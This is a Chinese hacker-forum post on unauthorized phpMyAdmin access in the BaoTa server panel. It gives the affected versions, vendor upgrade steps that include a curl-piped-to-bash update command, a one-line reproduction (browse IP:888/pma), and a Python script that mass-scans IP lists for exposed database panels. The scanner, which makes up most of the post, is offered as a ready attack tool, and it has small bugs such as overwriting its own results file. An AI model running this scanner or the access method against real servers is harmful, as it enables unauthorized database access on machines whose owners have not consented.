• Welcome to the world's largest Chinese hacker forum

    Welcome to the world's largest Chinese hacker forum, our forum registration is open! You can now register for technical communication with us, this is a free and open to the world of the BBS, we founded the purpose for the study of network security, please don't release business of black/grey, or on the BBS posts, to seek help hacker if violations, we will permanently frozen your IP and account, thank you for your cooperation. Hacker attack and defense cracking or network Security

    business please click here: Creation Security  From CNHACKTEAM

宝塔面板未授权访问phpMyAdmin(附批量脚本)


JieGe

Recommended Posts

  • Members

一、影响版本

Liunx版本7.4.2版本和windows版6.8版本的用户务必更新到最新版(其他版本不受影响)

二、修复方案

image-15-1024x791.png

或者使用升级脚本(注意:优先在面板首页直接点更新,失败的情况下,才使用此命令,且不能在面板自带的SSH终端执行):


 
 
curl https://download.bt.cn/install/update_panel.sh|bash

 
 
 
 
 
 

离线升级步骤:


 
 
下载离线升级包:http://download.bt.cn/install/update/LinuxPanel-7.4.3.zip
 
将升级包上传到服务器中的/root目录
 
解压文件:unzip LinuxPanel-7.4.3.zip
 
切换到升级包目录:cd panel
 
执行升级脚本:bash update.sh
 
删除升级包:cd .. && rm -f LinuxPanel-7.4.3.zip && rm -rf panel

 
 
 
 
 
 

三、复现过程

访问IP:888/pma可直接登陆数据库

image-16.png image-17-1024x569.png

四、批量脚本

image-20.png

 
 
#!/usr/bin/env python
 
# -*- coding:utf-8 -*-
 
 
 
"""
 
Author www.ti0s.com
 
"""
 
 
 
import sys
 
import argparse
 
import requests
 
from multiprocessing import Pool, Manager
 
 
 
print("""
 
_____ _ ____ ______ ____ ____ __ __
 
|_ _|(_) / \ / ___/ / ___\ / \ | \ / |
 
| | _ | / \ | \___ \ | / | / \ || \/ |
 
| | | || \__/ | /___ > _ | \___ | \__/ || |\ /| |
 
|_| |_| \____/ \/ (_) \____/ \____/ |_| \/ | |(C)
 
""")
 
headers = {
 
"User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.135 Safari/537.36",
 
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
 
}
 
 
 
def btPam(ip):
 
url = "http://%s:888/pma/" % (ip)
 
try:
 
res = requests.get(url,headers=headers,timeout=5)
 
if res.status_code == 200:
 
print("%s Potentially Vulnerable"%(ip))
 
with open("result.txt","w") as wf:
 
wf.write(url)
 
finally:
 
return
 
 
 
def isbt(ip, q):
 
print('Testing {}'.format(ip))
 
btPam(ip)
 
q.put(ip)
 
 
 
def readip(flie):
 
ips = []
 
with open(flie,"r") as rf:
 
for i in rf.readlines():
 
ip = i.lstrip('https://').lstrip('http://').rstrip(':888').rstrip("/").strip()
 
ips.append(ip)
 
return ips
 
 
 
def pool(ips):
 
p = Pool(10)
 
q = Manager().Queue()
 
for i in ips:
 
p.apply_async(isbt, args=(i,q,))
 
p.close()
 
p.join()
 
print('请查看当前路径下文件:result.txt')
 
 
 
def run(filepath):
 
ips=readip(filepath)
 
pool(ips)
 
 
 
def main():
 
parser = argparse.ArgumentParser()
 
parser.add_argument('-l','--file',dest='file',type=str,help='批量扫描IP地址,示例:-l ip.txt ')
 
parser.add_argument('-i','--ip',dest='ip',type=str,help='单独扫描IP地址,示例:-i 192.168.0.1')
 
pa = parser.parse_args()
 
if len(sys.argv[1:]) == 0:
 
print("输入 -h 参数查看使用说明")
 
exit()
 
if pa.ip:
 
btPam(pa.ip)
 
if pa.file:
 
run(pa.file)
 
 
 
if __name__ == '__main__':
 
main()

 
Link to comment
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now